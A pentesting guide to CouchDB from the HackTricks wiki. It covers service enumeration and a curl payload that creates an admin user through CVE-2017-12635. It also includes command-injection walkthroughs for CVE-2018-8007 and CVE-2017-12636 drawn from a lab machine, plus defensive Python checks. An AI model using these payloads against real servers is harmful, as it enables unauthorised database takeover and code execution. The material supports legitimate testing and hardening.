# 5984,6984 - Pentesting CouchDB
{% hint style="success" %}
Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}
## **Basic Information**
**CouchDB** is a **versatile and powerful database** that organizes data using a **key-value map** structure within each **document**. Fields within documents can be represented as **key/value pairs, lists, or maps**, providing flexibility in how data is stored and retrieved.
Each **document** stored in CouchDB is given a **unique identifier** (`_id`) at the document level. In addition, every change made and saved to the database is assigned a **revision number** (`_rev`). This revision number allows **changes to be tracked and managed** efficiently, simplifying data retrieval and synchronization within the database.
**Default port:** 5984(http), 6984(https)
```
PORT STATE SERVICE REASON
5984/tcp open unknown syn-ack
```
## **Automatic Enumeration**
```bash
# Run the CouchDB NSE scripts against the service port (5984 by default)
nmap -sV --script couchdb-databases,couchdb-stats -p <PORT> <IP>
msf> use auxiliary/scanner/couchdb/couchdb_enum
```
## Manual Enumeration
### Banner
```
curl http://IP:5984/
```
This issues a GET request to the installed CouchDB instance. The response should look like one of the following:
```bash
{"couchdb":"Welcome","version":"0.10.1"}
{"couchdb":"Welcome","version":"2.0.0","vendor":{"name":"The Apache Software Foundation"}}
```
{% hint style="info" %}
Note that if you receive a `401 Unauthorized` when accessing the couchdb root, with a body like `{"error":"unauthorized","reason":"Authentication required."}`, **you won't be able to access** the banner or any other endpoint.
{% endhint %}
### Info Enumeration
These are endpoints you can access with a **GET** request that return interesting information. You can find [**more endpoints and detailed descriptions in the couchdb documentation**](https://docs.couchdb.org/en/latest/api/index.html).
* **`/_active_tasks`** List of running tasks, including the task type, name, status and process ID.
* **`/_all_dbs`** Returns a list of all the databases in the CouchDB instance.
* **`/_cluster_setup`** Returns the status of the node or cluster, per the cluster setup wizard.
* **`/_db_updates`** Returns a list of all database events in the CouchDB instance. The `_global_changes` database must exist to use this endpoint.
* **`/_membership`** Displays the nodes that are part of the cluster as `cluster_nodes`. The `all_nodes` field lists all nodes this node knows about, including the ones that are part of the cluster.
* **`/_scheduler/jobs`** List of replication jobs. Each job description includes source and target information, the replication ID, a history of recent events, and a few other details.
* **`/_scheduler/docs`** List of replication document states. Includes information about all documents, even those in `completed` and `failed` states. For each document it returns the document ID, the database, the replication ID, source and target, and other information.
* **`/_scheduler/docs/{replicator_db}`**
* **`/_scheduler/docs/{replicator_db}/{docid}`**
* **`/_node/{node-name}`** The `/_node/{node-name}` endpoint can be used to confirm the Erlang node name of the server that processes the request. This is most useful when accessing `/_node/_local` to retrieve this information.
* **`/_node/{node-name}/_stats`** The `_stats` resource returns a JSON object containing the statistics for the running server. The literal string `_local` serves as an alias for the local node name, so for all stats URLs `{node-name}` may be replaced with `_local` to interact with the local node's statistics.
* **`/_node/{node-name}/_system`** The `_system` resource returns a JSON object containing various system-level statistics for the running server. You can use `_local` as `{node-name}` to get the current node's information.
* **`/_node/{node-name}/_restart`**
* **`/_up`** Confirms that the server is up, running, and ready to respond to requests. If [`maintenance_mode`](https://docs.couchdb.org/en/latest/config/couchdb.html#couchdb/maintenance\_mode) is `true` or `nolb`, the endpoint returns a 404 response.
* **`/_uuids`** Requests one or more Universally Unique Identifiers (UUIDs) from the CouchDB instance.
* **`/_reshard`** Returns a count of completed, failed, running, stopped, and total jobs along with the state of resharding on the cluster.
More interesting information can be extracted as explained here: [https://lzone.de/cheat-sheet/CouchDB](https://lzone.de/cheat-sheet/CouchDB)
### **Database List**
```
curl -X GET http://IP:5984/_all_dbs
```
If that request **responds with 401 Unauthorized**, then you need **valid credentials** to access the database:
```
curl -X GET http://user:password@IP:5984/_all_dbs
```
To obtain valid credentials you can **try** [**brute-forcing the service**](../generic-methodologies-and-resources/brute-force.md#couchdb).
This is an **example** of a couchdb **response** when you have **enough privileges** to list databases (it is just a list of dbs):
```bash
["_global_changes","_metadata","_replicator","_users","passwords","simpsons"]
```
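To turn the banner and `_all_dbs` responses above into a quick exposure check, here is an added Python example (not from the original page) that classifies whether an instance answers anonymously and which of the CVEs discussed on this page a reported version predates. The sample response bodies are the ones shown above, embedded as constructed strings; the fix versions come from the upstream Apache CouchDB advisories.

```python
import json

# Fix releases from the upstream Apache CouchDB advisories for the CVEs
# discussed on this page, keyed by CVE and then by major version.
FIXED_IN = {
    "CVE-2017-12635": {1: (1, 7, 0), 2: (2, 1, 1)},
    "CVE-2017-12636": {1: (1, 7, 0), 2: (2, 1, 1)},
    "CVE-2018-8007": {1: (1, 7, 2), 2: (2, 1, 2)},
}

# Constructed samples: the welcome banners, the 401 body and the db list
# exactly as this page shows them.
BANNER_OPEN = ('{"couchdb":"Welcome","version":"2.0.0",'
               '"vendor":{"name":"The Apache Software Foundation"}}')
BANNER_OLD = '{"couchdb":"Welcome","version":"0.10.1"}'
BODY_401 = '{"error":"unauthorized","reason":"Authentication required."}'
DB_LIST = '["_global_changes","_metadata","_replicator","_users","passwords","simpsons"]'


def parse_version(text):
    """'2.1.1' -> (2, 1, 1); stops at the first component with no digits."""
    parts = []
    for piece in text.split("."):
        digits = "".join(ch for ch in piece if ch.isdigit())
        if not digits:
            break
        parts.append(int(digits))
    return tuple(parts)


def unpatched_cves(version):
    """CVEs from this page whose fix release is newer than `version`."""
    ver = parse_version(version)
    if not ver:
        return []
    return [cve for cve, fixes in FIXED_IN.items()
            if ver[0] in fixes and ver < fixes[ver[0]]]


def triage(root_status, root_body, dbs_status, dbs_body):
    """Summarise the '/' and '/_all_dbs' responses of one instance."""
    result = {"auth_required": False, "anonymous_db_listing": False,
              "version": None, "unpatched": [], "databases": []}
    root = json.loads(root_body)
    if root_status == 401 or root.get("error") == "unauthorized":
        # Root already demands credentials: nothing else is reachable anonymously.
        result["auth_required"] = True
        return result
    result["version"] = root.get("version")
    if result["version"]:
        result["unpatched"] = unpatched_cves(result["version"])
    if dbs_status == 200:
        dbs = json.loads(dbs_body)
        if isinstance(dbs, list):
            # Database names visible without credentials: authentication is not
            # being enforced (the pre-3.0 "admin party" default with no admin set).
            result["anonymous_db_listing"] = True
            result["databases"] = dbs
    return result
```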
### Database Info
You can get some information about a database (such as the number of files and their size) by accessing the database name:
```bash
curl http://IP:5984/{dbname}
curl http://localhost:5984/simpsons
#Example response:
{"db_name":"simpsons","update_seq":"7-g1AAAAFTeJzLYWBg4MhgTmEQTM4vTc5ISXLIyU9OzMnILy7JAUoxJTIkyf___z8rkQmPoiQFIJlkD1bHjE-dA0hdPFgdAz51CSB19WB1jHjU5bEASYYGIAVUOp8YtQsgavfjtx-i9gBE7X1i1D6AqAX5KwsA2vVvNQ","sizes":{"file":62767,"external":1320,"active":2466},"purge_seq":0,"other":{"data_size":1320},"doc_del_count":0,"doc_count":7,"disk_size":62767,"disk_format_version":6,"data_size":2466,"compact_running":false,"instance_start_time":"0"}
```
### **Document List**
List every entry inside a database
```bash
curl -X GET http://IP:5984/{dbname}/_all_docs
curl http://localhost:5984/simpsons/_all_docs
#Example response:
{"total_rows":7,"offset":0,"rows":[
{"id":"f0042ac3dc4951b51f056467a1000dd9","key":"f0042ac3dc4951b51f056467a1000dd9","value":{"rev":"1-fbdd816a5b0db0f30cf1fc38e1a37329"}},
{"id":"f53679a526a868d44172c83a61000d86","key":"f53679a526a868d44172c83a61000d86","value":{"rev":"1-7b8ec9e1c3e29b2a826e3d14ea122f6e"}},
{"id":"f53679a526a868d44172c83a6100183d","key":"f53679a526a868d44172c83a6100183d","value":{"rev":"1-e522ebc6aca87013a89dd4b37b762bd3"}},
{"id":"f53679a526a868d44172c83a61002980","key":"f53679a526a868d44172c83a61002980","value":{"rev":"1-3bec18e3b8b2c41797ea9d61a01c7cdc"}},
{"id":"f53679a526a868d44172c83a61003068","key":"f53679a526a868d44172c83a61003068","value":{"rev":"1-3d2f7da6bd52442e4598f25cc2e84540"}},
{"id":"f53679a526a868d44172c83a61003a2a","key":"f53679a526a868d44172c83a61003a2a","value":{"rev":"1-4446bfc0826ed3d81c9115e450844fb4"}},
{"id":"f53679a526a868d44172c83a6100451b","key":"f53679a526a868d44172c83a6100451b","value":{"rev":"1-3f6141f3aba11da1d65ff0c13fe6fd39"}}
]}
```
### **Read Document**
Read the content of a document inside a database:
```bash
curl -X GET http://IP:5984/{dbname}/{id}
curl http://localhost:5984/simpsons/f0042ac3dc4951b51f056467a1000dd9
#Example response:
{"_id":"f0042ac3dc4951b51f056467a1000dd9","_rev":"1-fbdd816a5b0db0f30cf1fc38e1a37329","character":"Homer","quote":"Doh!"}
```
## CouchDB Privilege Escalation [CVE-2017-12635](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-12635)
Thanks to the differences between the Erlang and JavaScript JSON parsers you can **create an admin user** with credentials `hacktricks:hacktricks` with the following request:
```bash
curl -X PUT -d '{"type":"user","name":"hacktricks","roles":["_admin"],"roles":[],"password":"hacktricks"}' localhost:5984/_users/org.couchdb.user:hacktricks -H "Content-Type:application/json"
```
[**More information about this vuln here**](https://justi.cz/security/2017/11/14/couchdb-rce-npm.html).
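The request above works because the two parsers disagree on which of the duplicated `roles` keys counts. This added Python example (not from the original page) reproduces both behaviours on that exact document and shows the strict loader a service can use to reject duplicate keys outright, so that every component sees the same document or none at all.

```python
import json

# The body from the page's request: `roles` appears twice in one object.
USER_DOC = ('{"type":"user","name":"hacktricks","roles":["_admin"],'
            '"roles":[],"password":"hacktricks"}')


def last_wins(body):
    """Python's json module, like JavaScript's JSON.parse, keeps the LAST
    duplicate key. This is what the JS validate_doc_update saw: roles == []."""
    return json.loads(body)


def first_wins(body):
    """Emulate a parser that keeps the FIRST duplicate key, which is what the
    Erlang side did when looking up roles: roles == ["_admin"]."""
    def keep_first(pairs):
        out = {}
        for key, value in pairs:
            out.setdefault(key, value)
        return out
    return json.loads(body, object_pairs_hook=keep_first)


class DuplicateKeyError(ValueError):
    """Raised by strict_loads when any object repeats a key."""


def strict_loads(body):
    """Hardened loader: a duplicate key anywhere in the document is an error,
    so no two consumers can end up with different views of it."""
    def reject_dupes(pairs):
        seen = set()
        for key, _ in pairs:
            if key in seen:
                raise DuplicateKeyError(f"duplicate key: {key!r}")
            seen.add(key)
        return dict(pairs)
    return json.loads(body, object_pairs_hook=reject_dupes)


def roles_disagree(body):
    """True when first-wins and last-wins parsing yield different `roles`."""
    return last_wins(body)["roles"] != first_wins(body)["roles"]


def is_rejected(body):
    """True when the strict loader refuses the document."""
    try:
        strict_loads(body)
    except DuplicateKeyError:
        return True
    return False
```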
## CouchDB RCE
### **Erlang Cookie Security Overview**
Example [from here](https://0xdf.gitlab.io/2018/09/15/htb-canape.html).
In the CouchDB documentation, specifically in the section on cluster setup ([link](http://docs.couchdb.org/en/stable/cluster/setup.html#cluster-setup)), the use of ports by CouchDB in cluster mode is discussed. It is mentioned that, as in standalone mode, port `5984` is used. In addition, port `5986` is for node-local APIs, and, most importantly, Erlang requires TCP port `4369` for the Erlang Port Mapper Daemon (EPMD), which enables node communication within an Erlang cluster. This setup creates a mesh in which every node is linked to every other node.
An important security note is made about port `4369`. If this port is reachable from the Internet or any untrusted network, the security of the system depends heavily on a unique identifier known as the "cookie". This cookie acts as a safeguard. For instance, in a given process list, a cookie named "monster" may be observed, indicating its role in the system's security framework.
```
www-data@canape:/$ ps aux | grep couchdb
root 744 0.0 0.0 4240 640 ? Ss Sep13 0:00 runsv couchdb
root 811 0.0 0.0 4384 800 ? S Sep13 0:00 svlogd -tt /var/log/couchdb
homer 815 0.4 3.4 649348 34524 ? Sl Sep13 5:33 /home/homer/bin/../erts-7.3/bin/beam -K true -A 16 -Bd -- -root /home/homer/b
```
For those interested in understanding how this "cookie" can be exploited for Remote Code Execution (RCE) in the context of Erlang systems, a dedicated section is available for further reading. It details the methods of leveraging Erlang cookies in unauthorized ways to gain control over systems. You can **[explore the detailed guide on abusing Erlang cookies for RCE here](4369-pentesting-erlang-port-mapper-daemon-epmd.md#erlang-cookie-rce)**.
### **Exploiting CVE-2018-8007 via local.ini Modification**
Example [from here](https://0xdf.gitlab.io/2018/09/15/htb-canape.html).
A recently published vulnerability, CVE-2018-8007, affecting Apache CouchDB was explored, revealing that exploitation requires write permissions to the `local.ini` file. Although not directly applicable to the initial target system because of security restrictions, modifications were made to grant write access to the `local.ini` file for exploration purposes. Detailed steps and code examples are provided below, demonstrating the process.
First, the environment is prepared by ensuring the `local.ini` file is writable, verified by listing the permissions:
```bash
root@canape:/home/homer/etc# ls -l
-r--r--r-- 1 homer homer 18477 Jan 20 2018 default.ini
-rw-rw-rw- 1 homer homer 4841 Sep 14 17:39 local.ini
-r--r--r-- 1 root root 4841 Sep 14 14:30 local.ini.bk
-r--r--r-- 1 homer homer 1345 Jan 14 2018 vm.args
```
To exploit the vulnerability, a curl command is executed targeting the `cors/origins` configuration in `local.ini`. This injects a new origin along with additional lines under an `[os_daemons]` section, with the aim of executing arbitrary code:
```bash
www-data@canape:/dev/shm$ curl -X PUT 'http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/cors/origins' -H "Accept: application/json" -H "Content-Type: application/json" -d "0xdf\n\n[os_daemons]\ntestdaemon = /usr/bin/touch /tmp/0xdf"
```
Subsequent verification shows the injected configuration in `local.ini`, contrasted with a backup copy to highlight the changes:
```bash
root@canape:/home/homer/etc# diff local.ini local.ini.bk
119,124d118
< [cors]
< origins = 0xdf
< [os_daemons]
< test_daemon = /usr/bin/touch /tmp/0xdf
```
Initially, the expected file (`/tmp/0xdf`) does not exist, indicating that the injected command has not yet been executed. Further investigation shows that processes related to CouchDB are running, including one that could execute the injected command:
```bash
root@canape:/home/homer/bin# ps aux | grep couch
```
By killing the identified CouchDB process and allowing the system to restart it automatically, execution of the injected command is triggered, confirmed by the presence of the previously missing file:
```bash
root@canape:/home/homer/etc# kill 711
root@canape:/home/homer/etc# ls /tmp/0xdf
/tmp/0xdf
```
This exploration confirms the feasibility of exploiting CVE-2018-8007 under specific conditions, particularly the requirement for write access to the `local.ini` file. The code examples and procedural steps provided offer a clear guide to replicating the exploit in a controlled environment.
For more details on CVE-2018-8007, refer to the advisory from mdsec: [CVE-2018-8007](https://www.mdsec.co.uk/2018/08/advisory-cve-2018-8007-apache-couchdb-remote-code-execution/).
### **Exploring CVE-2017-12636 with local.ini Write Permissions**
Example [from here](https://0xdf.gitlab.io/2018/09/15/htb-canape.html).
A vulnerability known as CVE-2017-12636 was explored, which allows code execution through the CouchDB process, although specific configurations may prevent its exploitation. Despite the numerous Proof of Concept (POC) references available online, adjustments are needed to exploit the vulnerability on CouchDB version 2, which differs from the commonly targeted version 1.x. The initial steps involve verifying the CouchDB version and confirming the absence of the expected query servers path:
```bash
curl http://localhost:5984
curl http://0xdf:df@localhost:5984/_config/query_servers/
```
To adapt to CouchDB version 2.0, a new path is used:
```bash
curl 'http://0xdf:df@localhost:5984/_membership'
curl http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/query_servers
```
Attempts to add and invoke a new query server met with permission-related errors, as shown by the following output:
```bash
curl -X PUT 'http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/query_servers/cmd' -d '"/sbin/ifconfig > /tmp/df"'
```
Further investigation revealed permission issues with the `local.ini` file, which was not writable. By changing the file permissions using root or homer access, it became possible to proceed:
```bash
cp /home/homer/etc/local.ini /home/homer/etc/local.ini.b
chmod 666 /home/homer/etc/local.ini
```
Subsequent attempts to add the query server succeeded, as shown by the absence of an error message in the response. The successful modification of the `local.ini` file was confirmed by comparing the files:
```bash
curl -X PUT 'http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/query_servers/cmd' -d '"/sbin/ifconfig > /tmp/df"'
```
The process continued with the creation of a database and a document, followed by an attempt to execute code via a custom view map for the newly added query server:
```bash
curl -X PUT 'http://0xdf:df@localhost:5984/df'
curl -X PUT 'http://0xdf:df@localhost:5984/df/zero' -d '{"_id": "HTP"}'
curl -X PUT 'http://0xdf:df@localhost:5984/df/_design/zero' -d '{"_id": "_design/zero", "views": {"anything": {"map": ""} }, "language": "cmd"}'
```
A **[summary](https://github.com/carlospolop/hacktricks/pull/116/commits/e505cc2b557610ef5cce09df6a14b10caf8f75a0)** with an alternative payload provides further insight into exploiting CVE-2017-12636 under specific conditions. **Useful resources** for exploiting this vulnerability include:
- [POC exploit code](https://raw.githubusercontent.com/vulhub/vulhub/master/couchdb/CVE-2017-12636/exp.py)
- [Exploit Database entry](https://www.exploit-db.com/exploits/44913/)
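Both the CVE-2018-8007 and the CVE-2017-12636 walkthroughs above leave a trace in `local.ini`: an `[os_daemons]` entry written through a newline-laden config value, and a `[query_servers]` entry whose "language" is a shell command. This added Python example (not from the original write-up) parses such a file and flags both, and checks a config value for the line breaks the CVE-2018-8007 payload depends on before it is written. The ini text is constructed from the page's `diff` output and the `query_servers/cmd` request; the baseline query-server names are an assumption taken from CouchDB's shipped `default.ini`.

```python
import configparser

# Query-server names CouchDB ships in default.ini (assumed baseline; extend
# it with whatever your own deployment legitimately registers).
EXPECTED_QUERY_SERVERS = {"javascript", "coffeescript"}

# Constructed sample: the lines the page's `diff local.ini local.ini.bk`
# shows for CVE-2018-8007, plus the `cmd` query server registered in the
# CVE-2017-12636 section. The javascript line stands in for the normal entry.
SAMPLE_LOCAL_INI = """
[cors]
origins = 0xdf

[os_daemons]
test_daemon = /usr/bin/touch /tmp/0xdf

[query_servers]
javascript = ./bin/couchjs ./share/server/main.js
cmd = /sbin/ifconfig > /tmp/df
"""


def audit_local_ini(text):
    """Return (section, key, value) entries a reviewer should look at:
    every [os_daemons] entry (CouchDB launches these as OS processes) and
    every [query_servers] entry whose name is outside the baseline."""
    cp = configparser.ConfigParser(interpolation=None, strict=False,
                                   allow_no_value=True)
    cp.read_string(text)
    findings = []
    if cp.has_section("os_daemons"):
        for key, value in cp.items("os_daemons"):
            findings.append(("os_daemons", key, value))
    if cp.has_section("query_servers"):
        for key, value in cp.items("query_servers"):
            if key not in EXPECTED_QUERY_SERVERS:
                findings.append(("query_servers", key, value))
    return findings


def is_safe_config_value(value):
    """Reject values that could break out of their `key = value` line: the
    CVE-2018-8007 payload needs embedded newlines to open a new section."""
    return not any(ch in value for ch in "\r\n\x00")
```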
## Shodan
* `port:5984 couchdb`
## References
* [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html)
* [https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution](https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution)